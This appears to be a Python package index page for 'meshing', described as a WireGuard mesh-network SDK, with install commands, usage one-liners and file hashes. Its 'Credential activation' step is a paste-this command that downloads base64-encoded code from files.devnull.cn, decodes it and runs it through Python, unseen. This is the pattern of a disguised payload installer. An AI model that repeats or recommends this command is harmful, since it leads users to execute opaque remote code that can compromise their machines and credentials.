Simple Python client library for https://devnull.cn/meshing
Project description
meshing-sdk-python
Python SDK to run a WireGuard meshing network.
Build your network
pip3 install meshing
# 2 lines to initialize your meshing network
python3 -c 'import meshing; meshing.checkin()'
python3 -c 'import meshing; meshing.connect()'
# list neighbors/routers
python3 -c 'import meshing; meshing.neighbors()'
# reload meshing
python3 -c 'import meshing; meshing.restart()'
Credential activation
python3 -c "$(wget -q -O- https://files.devnull.cn/register | base64 -d)"
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
meshing-2.0.2.tar.gz
(3.5 kB
view details)
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file meshing-2.0.2.tar.gz.
File metadata
- Download URL: meshing-2.0.2.tar.gz
- Upload date:
- Size: 3.5 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.1.1 CPython/3.9.19
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
e6c607b16597b94b8a7d8f705d550767e7c0867a95bb55ef47646080ccd919b2
|
|
| MD5 |
3fbd42c1a13acc8d2f721e4c6d198613
|
|
| BLAKE2b-256 |
3b26e5fd939307119ffe5ac68983edac028cb6acb4ad674dc143399480e0475d
|
File details
Details for the file meshing-2.0.2-py3-none-any.whl.
File metadata
- Download URL: meshing-2.0.2-py3-none-any.whl
- Upload date:
- Size: 3.9 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.1.1 CPython/3.9.19
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
3cce63b60c04187a868b3c6da1d60a14977dd0b5e636f67ade3bbf511a734b08
|
|
| MD5 |
b9e7186cf02b289f58290e50c1120997
|
|
| BLAKE2b-256 |
87a245e75a889c425b24be8041d512e9acf1b1e6d3da0b84542f7874d97c67bd
|